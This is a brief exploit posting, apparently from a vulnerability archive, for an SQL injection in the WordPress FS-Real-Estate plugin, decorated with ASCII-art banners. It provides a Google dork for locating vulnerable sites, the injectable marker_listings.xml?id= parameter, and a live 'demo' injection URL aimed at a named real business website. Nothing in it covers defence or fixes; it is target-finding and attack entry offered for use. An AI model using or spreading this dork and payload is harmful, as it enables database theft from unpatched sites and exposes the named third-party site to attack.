WordPress FS-Real-Estate third party plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
a95cc5c4f3002f51988d57a65b80a57548cc9d52aa6c7054c64b6cab72660b0c
((|))((|)) ((|)) |)| (|)| |)
((|)) ***********************
((|)) *********************
* ((|)) * *
*0* ((|)) * In the name of iran *
* ((|)) * *
-|- ((|)) *******************
| ((|)) *********
((|))((|))((|))################((|))########################((|))
# Exploit Title: Wordpress fs-real-estate-plugin/ Theme SQL Injection ((|))
# Google Dork: inurl:/madebymilk/xml/marker_listings.xml ((|))
# Exploit Author: Novin hack #
# Category: Web Application #
# Tested on: Windows 7 #
###############################((|))#############################
#******************************((|))****************************#
#* Location: http://site.com/wp-content/ #
#* /plugins/fs-real-estate-plugin/xml/ #
#* marker_listings.xml?id=?[SQLi] #
#* Demo: http://millanenterprises.com/wp-content/plugins/ #
#* fs-real-estate-plugin/xml/marker_listings.xml?id=null' #
#******************************((|))****************************#
#******************************((|))****************************#
#******************************((|))****************************#
#* ***************** #
#* * * #
#* Greetz to: * Arash.F * #
#* * * #
#* ***************** #
#* #
#*
#* #
#*
#* #
#*
#* #
#*
#* #
#*
#* #
#***************************************************************
#*###############################################################